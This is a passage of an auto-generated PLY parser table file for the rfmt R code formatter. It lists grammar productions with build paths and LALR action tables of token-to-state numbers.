formlist','formlist',3,'p_formlist','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',982), ('form -> SYMBOL','form',1,'p_form','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',993), ('form -> SYMBOL EQ_ASSIGN expr','form',3,'p_form','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',994), ('expr -> expr [ sublist ]','expr',4,'p_expr_subscript','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',1003), ('expr -> expr LBB sublist ] ]','expr',5,'p_expr_subscript','/usr/local/google/users/pyelland/perforce/pyelland5_Piper/google3/blaze-bin/third_party/R/tools/rfmt/rfmt.runfiles/google3/third_party/R/tools/rfmt/formatter/r_language.py',1004), ]
_tabversion = '3.8' _lr_method = 'LALR' _lr_signature = 'm%\x1f\x13¨{\x7f±\x0f´\x8fr\x0cc\x8b\x0e' _lr_action_items = {'[': ([9, 10, 16, 17, 19, 20, 22, 26, 28, 29, 31, 37, 71, 72, 77, 78, 79, 80, 81, 83, 84, 85, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 103, 104, 105, 106, 107, 108, 109, 110, 111, 113, 114, 127, 129, 130, 131, 136, 137, 139, 141, 142, 143, 146, 147], [-12, -10, -11, -13, -14, -15, 66, 66, 66, 66, 66, -63, 66, -48, 66, -58, 66, 66, 66, -14, -15, 66, 66, 66, 66, 66, 66, 66, 66, 66, 66, 66, 66, 66, -3, 66, 66, 66, 66, 66, 66, 66, 66, 66, 66, 66, 66, -16, -71, 66, 66, 66, 66, -72, -65, -60, -62, -64, -61]), 'WHILE': ([1, 3, 4, 5, 6, 7, 8, 11, 15, 18, 25, 35, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 82, 117, 118, 124, 125, 126, 133, 134, 135, 144, 145], [21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21, 21]), 'AND': ([9, 10, 16, 17, 19, 20, 22, 26, 28, 29, 31, 37, 71, 72, 77, 78, 79, 80, 81, 83, 84, 85, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 103, 104, 105, 106, 107, 108, 109, 110, 111, 113, 114, 127, 129, 130, 131, 136, 137, 139, 141, 142, 143, 146, 147], [-12, -10, -11, -13, -14, -15, 51, -19, -18, -17, 51, -63, 51, -48, 51, -58, 51, -25, 51, -14, -15, 51, -29, -27, -28, -30, -22, -36, -41, 51, -26, -42, 51, -38, -3, -40, -37, 51, -39, -23, -24, 51, 51, 51, -32, -31, 51, -16, -71, 51, 51, 51, 51, -72, -65, -60, -62, -64, -61]), 'EQ_ASSIGN': ([9, 10, 16, 17, 19, 20, 22, 26, 28, 29, 31, 37, 71, 72, 74, 78, 80, 81, 83, 84, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 103, 104, 105, 106, 107, 108, 109, 110, 111, 113, 114, 127, 129, 139, 141, 142, 143, 146, 147], [-12, -10, -11, -13, -14, -15, 54, -19, -18, -17, -21, -63, -20, -48, 118, -58, -25, -33, 124, 125, -29, -27, -28, -30, -22, -36, -41, -35, -26, -42, -44, -38, -3, -40, -37, -46, -39, -23, -24, -43, -45, -47, -32, -31, -34, -16, -71, -72, -65, -60, -62, -64, -61]), 'FUNCTION': ([1, 3, 4, 5, 6, 7, 8, 11, 15, 18, 25, 35, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 82, 117, 118, 124, 125, 126, 133, 134, 135, 144, 145], [13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13, 13]), 'BREAK': ([1, 3, 4, 5, 6, 7, 8, 11, 15, 18, 25, 35, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 82, 117, 118, 124, 125, 126, 133, 134, 135, 144, 145], [9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9]), 'IF': ([1, 3, 4, 5, 6, 7, 8, 11, 15, 18, 25, 35, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 82, 117, 118, 124, 125, 126, 133, 134, 135, 144, 145], [14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14, 14]), 'CR': ([1, 7, 9, 10, 11, 15, 16, 17, 19, 20, 22, 23, 26, 28, 29, 31, 37, 69, 70, 71, 72, 78, 80, 81, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 103, 104, 105, 106, 107, 108, 109, 110, 111, 113, 114, 127, 129, 139, 141, 142, 143, 146, 147], [11, 11, -12, -10, 11, 11, -11, -13, -14, -15, -2, 70, -19, -18, -17, -21, -63, 11, 11, -20, -48, -58, -25, -33, -29, -27, -28, -30, -22, -36, -41, -35, -26, -42, -44, -38, -3, -40, -37, -46, -39, -23, -24, -43, -45, -47, -32, -31, -34, -16, -71, -72, -65, -60, -62, -64, -61]), 'NEXT': ([1, 3, 4, 5, 6, 7, 8, 11, 15, 18, 25, 35, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 82, 117, 118, 124, 125, 126, 133, 134, 135, 144, 145], [16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16]), 'OR': ([9, 10, 16, 17, 19, 20, 22, 26, 28, 29, 31, 37, 71, 72, 77, 78, 79, 80, 81, 83, 84, 85, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 103, 104, 105, 106, 107, 108, 109, 110, 111, 113, 114, 127, 129, 130, 131, 136, 137, 139, 141, 142, 143, 146, 147], [-12, -10, -11, -13, -14, -15, 62, -19, -18, -17, 62, -63, 62, -48, 62, -58, 62, -25, 62, -14, -15, 62, -29, -27, -28, -30, -22, -36, -41, 62, -26, -42, 62, -38, -3, -40, -37, 62, -39, -23, -24, -43, 62, 62, -32, -31, 62, -16, -71, 62, 62, 62, 62, -72, -65, -60, -62, -64, -61]), 'IN': ([73], [117]), 'GE': ([9, 10, 16, 17, 19, 20, 22, 26, 28, 29, 31, 37, 71, 72, 77, 78, 79, 80, 81, 83, 84, 85, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 103, 104, 105, 106, 107, 108, 109, 110, 111, 113, 114, 127, 129, 130, 131, 136, 137, 139, 141, 142, 143, 146, 147], [-12, -10, -11, -13, -14, -15, 55, 55, -18, -17, 55, -63, 55, -48, 55, -58, 55, -25, 55, -14, -15, 55, -29, -27, -28, -30, -22, -36, -41, 55, -26, 55, 55, -38, -3, -40, -37, 55, -39, -23, -24, 55, 55, 55, -32, -31, 55, -16, -71, 55, 55, 55, 55, -72, -65, -60, -62, -64, -61]), 'ELSE': ([9, 10, 16, 17, 19, 20, 22, 26, 28, 29, 31, 37, 71, 72, 78, 80, 81, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 103, 104, 105, 106, 107, 108, 109, 110, 111, 113, 114, 127, 129, 139, 141, 142, 143, 146, 147], [-12, -10, -11, -13, -14, -15, -2, -19, -18, -17, -21, -63, -20, -48, -58, -25, -33, -29, -27, -28, -30, -22, -36, -41, -35, -26, -42, -44, -38, -3, -40, -37, -46, -39, -23, -24, -43, -45, -47, -32, -31, -34, -16, -71, -72, -65, 145, -62, -64, -61]), '-': ([1, 3, 4, 5, 6, 7, 8, 9, 10, 11, 15, 16, 17, 18, 19, 20, 22, 25, 26, 28, 29, 31, 35, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 77, 78, 79, 80, 81, 82, 83, 84, 85, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 103, 104, 105, 106, 107, 108, 109, 110, 111, 113, 114, 117, 118, 124, 125, 126, 127, 129, 130, 131, 133, 134, 135, 136, 137, 139, 141, 142, 143, 144, 145, 146, 147], [6, 6, 6, 6, 6, 6, 6, -12, -10, 6, 6, -11, -13, 6, -14, -15, 44, 6, 44, -18, -17, 44, 6, -63, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 44, -48, 44, -58, 44, -25, 44, 6, -14, -15, 44, -29, -27, -28, -30, -22, 44, 44, 44, -26, 44, 44, 44, -3, 44, 44, 44, 44, -23, -24, 44, 44, 44, -32, -31, 44, 6, 6, 6, 6, 6, -16, -71, 44, 44, 6, 6, 6, 44, 44, -72, -65, -60, -62, 6, 6, -64, -61]), ',': ([9, 10, 16, 17, 19, 20, 22, 26, 28, 29, 31, 37, 41, 56, 66, 71, 72, 74, 75, 78, 80, 81, 82, 83, 84, 85, 86, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 103, 104, 105, 106, 107, 108, 109, 110, 111, 113, 114, 124, 125, 126, 127, 129, 131, 136, 137, 139, 141, 142, 143, 146, 147], [-12, -10, -11, -13, -14, -15, -2, -19, -18, -17, -21, -63, 82, 82, 82, -20, -48, -69, 119, -58, -25, -33, 82, -14, -15, -53, 126, -29, -27, -28, -30, -22, -36, -41, -35, -26, -42, -44, -38, -3, -40, -37, -46, -39, -23, -24, -43, -45, -47, -32, -31, -34, -56, -54, 82, -16, -71, -70, -57, -55, -72, -65, -60, -62, -64, -61]), '/': ([9, 10, 16, 17, 19, 20, 22, 26, 28, 29, 31, 37, 71, 72, 77, 78, 79, 80, 81, 83, 84, 85, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 103, 104, 105, 106, 107, 108, 109, 110, 111, 113, 114, 127, 129, 130, 131, 136, 137, 139, 141, 142, 143, 146, 147], [-12, -10, -11, -13, -14, -15, 45, 45, -18, -17, 45, -63, 45, -48, 45, -58, 45, -25, 45, -14, -15, 45, -29, 45, 45, -30, -22, 45, 45, 45, -26, 45, 45, 45, -3, 45, 45, 45, 45, -23, -24, 45, 45, 45, -32, -31, 45, -16, -71, 45, 45, 45, 45, -72, -65, -60, -62, -64, -61]), 'LE': ([9, 10, 16, 17, 19, 20, 22, 26, 28, 29, 31, 37, 71, 72, 77, 78, 79, 80, 81, 83, 84, 85, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 103, 104, 105, 106, 107, 108, 109, 110, 111, 113, 114, 127, 129, 130, 131, 136, 137, 139, 141, 142, 143, 146, 147], [-12, -10, -11, -13, -14, -15, 57, 57, -18, -17, 57, -63, 57, -48, 57, -58, 57, -25, 57, -14, -15, 57, -29, -27, -28, -30, -22, -36, -41, 57, -26, 57, 57, -38, -3, -40, -37, 57, -39, -23, -24, 57, 57, 57, -32, -31, 57, -16, -71, 57, 57, 57, 57, -72, -65, -60, -62, -64, -61]), ')': ([9, 10, 16, 17, 19, 20, 22, 26, 27, 28, 29, 31, 34, 37, 41, 71, 72, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 103, 104, 105, 106, 107, 108, 109, 110, 111, 113, 114, 119, 120, 121, 122, 123, 124, 125, 126, 127, 129, 130, 131, 132, 136, 137, 138, 139, 140, 141, 142, 143, 146, 147], [-12, -10, -11, -13, -14, -15, -2, -19, 72, -18, -17, -21, -66, -63, -49, -20, -48, -69, -67, -59, -59, -58, -59, -25, -33, -49, -14, -15, -53, -50, 127, -29, -27, -28, -30, -22, -36, -41, -35, -26, -42, -44, -38, -3, -40, -37, -46, -39, -23, -24, -43, -45, -47, -32, -31, -34, -66, 133, 134, 135, -51, -56, -54, -49, -16, -71, -59, -70, -68, -57, -55, -52, -72, 144, -65, -60, -62, -64, -61]), '(': ([1, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 25, 26, 28, 29, 31, 35, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 77, 78, 79, 80, 81, 82, 83, 84, 85, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 103, 104, 105, 106, 107, 108, 109, 110, 111, 113, 114, 117, 118, 124, 125, 126, 127, 129, 130, 131, 133, 134, 135, 136, 137, 139, 141, 142, 143, 144, 145, 146, 147], [4, 4, 4, 4, 4, 4, 4, -12, -10, 4, 33, 34, 35, 4, -11, -13, 4, -14, -15, 38, 41, 4, 41, 41, 41, 41, 4, -63, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 41, -48, 41, -58, 41, 41, 41, 4, -14, -15, 41, 41, 41, 41, 41, 41, 41, 41, 41, 41, 41, 41, 41, -3, 41, 41, 41, 41, 41, 41, 41, 41, 41, 41, 41, 41, 4, 4, 4, 4, 4, -16, -71, 41, 41, 4, 4, 4, 41, 41, -72, -65, -60, -62, 4, 4, -64, -61]), '+': ([1, 3, 4, 5, 6, 7, 8, 9, 10, 11, 15, 16, 17, 18, 19, 20, 22, 25, 26, 28, 29, 31, 35, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 77, 78, 79, 80, 81, 82, 83, 84, 85, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 103, 104, 105, 106, 107, 108, 109, 110, 111, 113, 114, 117, 118, 124, 125, 126, 127, 129, 130, 131, 133, 134, 135, 136, 137, 139, 141, 142, 143, 144, 145, 146, 147], [5, 5, 5, 5, 5, 5, 5, -12, -10, 5, 5, -11, -13, 5, -14, -15, 43, 5, 43, -18, -17, 43, 5, -63, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 43, -48, 43, -58, 43, -25, 43, 5, -14, -15, 43, -29, -27, -28, -30, -22, 43, 43, 43, -26, 43, 43, 43, -3, 43, 43, 43, 43, -23, -24, 43, 43, 43, -32, -31, 43, 5, 5, 5, 5, 5, -16, -71, 43, 43, 5, 5, 5, 43, 43, -72, -65, -60, -62, 5, 5, -64, -61]), '*': ([9, 10, 16, 17, 19, 20, 22, 26, 28, 29, 31, 37, 71, 72, 77, 78, 79, 80, 81, 83, 84, 85, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 103, 104, 105, 106, 107, 108, 109, 110, 111, 113, 114, 127, 129, 130, 131, 136, 137, 139, 141, 142, 143, 146, 147], [-12, -10, -11, -13, -14, -15, 42, 42, -18, -17, 42, -63, 42, -48, 42, -58, 42, -25, 42, -14, -15, 42, -29, 42, 42, -30, -22, 42, 42, 42, -26, 42, 42, 42, -3, 42, 42, 42, 42, -23, -24, 42, 42, 42, -32, -31, 42, -16, -71, 42, 42, 42, 42, -72, -65, -60, -62, -64, -61]), '%': ([9, 10, 16, 17, 19, 20, 22, 26, 28, 29, 31, 37, 71, 72, 77, 78, 79, 80, 81, 83, 84, 85, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 103, 104, 105, 106, 107, 108, 109, 110, 111, 113, 114, 127, 129, 130, 131, 136, 137, 139, 141, 142, 143, 146, 147], [-12, -10, -11, -13, -14, -15, 40, -19, -18, -17, -21, -63, -20, -48, 40, -58, 40, -25, 40, -14, -15, 40, -29, -27, -28, -30, -22, -36, -41, -35, -26, -42, 40, -38, -3, -40, -37, -46, -39, -23, -24, -43, 40, -47, -32, -31, -34, -16, -71, 40, 40, 40, 40, -72, -65, -60, -62, -64, -61]), '$': ([9, 10, 16, 17, 19, 20, 22, 26, 28, 29, 31, 37, 71, 72, 77, 78, 79, 80, 81, 83, 84, 85, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 103, 104, 105, 106, 107, 108, 109, 110, 111, 113, 114, 127, 129, 130, 131, 136, 137, 139, 141, 142, 143, 146, 147], [-12, -10, -11, -13, -14, -15, 39, 39, 39, 39, 39, -63, 39, -48, 39, -58, 39, -25, 39, -14, -15, 39, 39, 39, 39, 39, 39, 39, 39, 39, -26, 39, 39, 39, -3, 39, 39, 39, 39, -23, -24, 39, 39, 39, 39, 39, 39, -16, -71, 39, 39, 39, 39, -72, -65, -60, -62, -64, -61]), '!': ([1, 3, 4, 5, 6, 7, 8, 11, 15, 18, 25, 35, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 82, 117, 118, 124, 125, 126, 133, 134, 135, 144, 145], [3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3]), 'NE': ([9, 10, 16, 17, 19, 20, 22, 26, 28, 29, 31, 37, 71, 72, 77, 78, 79, 80, 81, 83, 84, 85, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 103, 104, 105, 106, 107, 108, 109, 110, 111, 113, 114, 127, 129, 130, 131, 136, 137, 139, 141, 142, 143, 146, 147], [-12, -10, -11, -13, -14, -15, 59, 59, -18, -17, 59, -63, 59, -48, 59, -58, 59, -25, 59, -14, -15, 59, -29, -27, -28, -30, -22, -36, -41, 59, -26, 59, 59, -38, -3, -40, -37, 59, -39, -23, -24, 59, 59, 59, -32, -31, 59, -16, -71, 59, 59, 59, 59, -72, -65, -60, -62, -64, -61]), '<': ([9, 10, 16, 17, 19, 20, 22, 26, 28, 29, 31, 37, 71, 72, 77, 78, 79, 80, 81, 83, 84, 85, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 103, 104, 105, 106, 107, 108, 109, 110, 111, 113, 114, 127, 129, 130, 131, 136, 137, 139, 141, 142, 143, 146, 147], [-12, -10, -11, -13, -14, -15, 47, 47, -18, -17, 47, -63, 47, -48, 47, -58, 47, -25, 47, -14, -15, 47, -29, -27, -28, -30, -22, -36, -41, 47, -26, 47, 47, -38, -3, -40, -37, 47, -39, -23, -24, 47, 47, 47, -32, -31, 47, -16, -71, 47, 47, 47, 47, -72, -65, -60, -62, -64, -61]), '?': ([1, 3, 4, 5, 6, 7, 8, 9, 10, 11, 15, 16, 17, 18, 19, 20, 22, 25, 26, 28, 29, 31, 35, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 77, 78, 79, 80, 81, 82, 83, 84, 85, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 103, 104, 105, 106, 107, 108, 109, 110, 111, 113, 114, 117, 118, 124, 125, 126, 127, 129, 130, 131, 133, 134, 135, 136, 137, 139, 141, 142, 143, 144, 145, 146, 147], [8, 8, 8, 8, 8, 8, 8, -12, -10, 8, 8, -11, -13, 8, -14, -15, 49, 8, -19, -18, -17, -21, 8, -63, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, -20, -48, 49, -58, 49, -25, 49, 8, -14, -15, 49, -29, -27, -28, -30, -22, -36, -41, -35, -26, -42, 49, -38, -3, -40, -37, -46, -39, -23, -24, -43, 49, -47, -32, -31, -34, 8, 8, 8, 8, 8, -16, -71, 49, 49, 8, 8, 8, 49, 49, -72, -65, -60, -62, 8, 8, -64, -61]), '>': ([9, 10, 16, 17, 19, 20, 22, 26, 28, 29, 31, 37, 71, 72, 77, 78, 79, 80, 81, 83, 84, 85, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 103, 104, 105, 106, 107, 108, 109, 110, 111, 113, 114, 127, 129, 130, 131, 136, 137, 139, 141, 142, 143, 146, 147], [-12, -10, -11, -13, -14, -15, 48, 48, -18, -17, 48, -63, 48, -48, 48, -58, 48, -25, 48, -14, -15, 48, -29, -27, -28, -30, -22, -36, -41, 48, -26, 48, 48, -38, -3, -40, -37, 48, -39, -23, -24, 48, 48, 48, -32, -31, 48, -16, -71, 48, 48, 48, 48, -72, -65, -60, -62, -64, -61]), 'SYMBOL': ([1, 3, 4, 5, 6, 7, 8, 11, 15, 18, 25, 33, 34, 35, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 82, 117, 118, 119, 124, 125, 126, 133, 134, 135, 144, 145], [20, 20, 20, 20, 20, 20, 20, 20, 20, 20, 20, 73, 74, 20, 20, 20, 20, 84, 20, 20, 20, 20, 20, 20, 20, 20, 20, 20, 20, 20, 20, 20, 84, 20, 20, 20, 20, 20, 20, 20, 20, 20, 84, 20, 20, 20, 20, 84, 20, 20, 74, 20, 20, 84, 20, 20, 20, 20, 20]), ':': ([9, 10, 16, 17, 19, 20, 22, 26, 28, 29, 31, 37, 71, 72, 77, 78, 79, 80, 81, 83, 84, 85, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 103, 104, 105, 106, 107, 108, 109, 110, 111, 113, 114, 127, 129, 130, 131, 136, 137, 139, 141, 142, 143, 146, 147], [-12, -10, -11, -13, -14, -15, 46, 46, -18, -17, 46, -63, 46, -48, 46, -58, 46, -25, 46, -14, -15, 46, 46, 46, 46, 46, -22, 46, 46, 46, -26, 46, 46, 46, -3, 46, 46, 46, 46, -23, -24, 46, 46, 46, 46, -31, 46, -16, -71, 46, 46, 46, 46, -72, -65, -60, -62, -64, -61]), 'NUM_CONST': ([1, 3, 4, 5, 6, 7, 8, 11, 15, 18, 25, 35, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 82, 117, 118, 124, 125, 126, 133, 134, 135, 144, 145], [17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17, 17]), 'EQ': ([9, 10, 16, 17, 19, 20, 22, 26, 28, 29, 31, 37, 71, 72, 77, 78, 79, 80, 81, 83, 84, 85, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 103, 104, 105, 106, 107, 108, 109, 110, 111, 113, 114, 127, 129, 130, 131, 136, 137, 139, 141, 142, 143, 146, 147], [-12, -10, -11, -13, -14, -15, 53, 53, -18, -17, 53, -63, 53, -48, 53, -58, 53, -25, 53, -14, -15, 53, -29, -27, -28, -30, -22, -36, -41, 53, -26, 53, 53, -38, -3, -40, -37, 53, -39, -23, -24, 53, 53, 53, -32, -31, 53, -16, -71, 53, 53, 53, 53, -72, -65, -60, -62, -64, -61]), 'OR2': ([9, 10, 16, 17, 19, 20, 22, 26, 28, 29, 31, 37, 71, 72, 77, 78, 79, 80, 81, 83, 84, 85, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 103, 104, 105, 106, 107, 108, 109, 110, 111, 113, 114, 127, 129, 130, 131, 136, 137, 139, 141, 142, 143, 146, 147], [-12, -10, -11, -13, -14, -15, 63, -19, -18, -17, -21, -63, -20, -48, 63, -58, 63, -25, 63, -14, -15, 63, -29, -27, -28, -30, -22, -36, -41, -35, -26, -42, 63, -38, -3, -40, -37, -46, -39, -23, -24, -43, 63, -47, -32, -31, -34, -16, -71, 63, 63, 63, 63, -72, -65, -60, -62, -64, -61]), ';': ([1, 7, 9, 10, 11, 15, 16, 17, 19, 20, 22, 23, 26, 28, 29, 31, 37, 69, 70, 71, 72, 78, 80, 81, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 103, 104, 105, 106, 107, 108, 109, 110, 111, 113, 114, 127, 129, 139, 141, 142, 143, 146, 147], [7, 7, -12, -10, 7, 7, -11, -13, -14, -15, -2, 69, -19, -18, -17, -21, -63, 7, 7, -20, -48, -58, -25, -33, -29, -27, -28, -30, -22, -36, -41, -35, -26, -42, -44, -38, -3, -40, -37, -46, -39, -23, -24, -43, -45, -47, -32, -31, -34, -16, -71, -72, -65, -60, -62, -64, -61]), 'LEFT_ASSIGN': ([9, 10, 16, 17, 19, 20, 22, 26, 28, 29, 31, 37, 71, 72, 77, 78, 79, 80, 81, 83, 84, 85, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 103, 104, 105, 106, 107, 108, 109, 110, 111, 113, 114, 127, 129, 130, 131, 136, 137, 139, 141, 142, 143, 146, 147], [-12, -10, -11, -13, -14, -15, 58, -19, -18, -17, 58, -63, -20, -48, 58, -58, 58, -25, 58, -14, -15, 58, -29, -27, -28, -30, -22, -36, -41, 58, -26, -42, 58, -38, -3, -40, -37, 58, -39, -23, -24, -43, 58, -47, -32, -31, -34, -16, -71, 58, 58, 58, 58, -72, -65, -60, -62, -64, -61]), '@': ([9, 10, 16, 17, 19, 20, 22, 26, 28, 29, 31, 37, 71, 72, 77, 78, 79, 80, 81, 83, 84, 85, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 103, 104, 105, 106, 107, 108, 109, 110, 111, 113, 114, 127, 129, 130, 131, 136, 137, 139, 141, 142, 143, 146, 147], [-12, -10, -11, -13, -14, -15, 50, 50, 50, 50, 50, -63, 50, -48, 50, -58, 50, -25, 50, -14, -15, 50, 50, 50, 50, 50, 50, 50, 50, 50, -26, 50, 50, 50, -3, 50, 50, 50, 50, -23, -24, 50, 50, 50, 50, 50, 50, -16, -71, 50, 50, 50, 50, -72, -65, -60, -62, -64, -61]), 'LBB': ([9, 10, 16, 17, 19, 20, 22, 26, 28, 29, 31, 37, 71, 72, 77, 78, 79, 80, 81, 83, 84, 85, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 103, 104, 105, 106, 107, 108, 109, 110, 111, 113, 114, 127, 129, 130, 131, 136, 137, 139, 141, 142, 143, 146, 147], [-12, -10, -11, -13, -14, -15, 56, 56, 56, 56, 56, -63, 56, -48, 56, -58, 56, 56, 56, -14, -15, 56, 56, 56, 56, 56, 56, 56, 56, 56, 56, 56, 56, 56, -3, 56, 56, 56, 56, 56, 56, 56, 56, 56, 56, 56, 56, -16, -71, 56, 56, 56, 56, -72, -65, 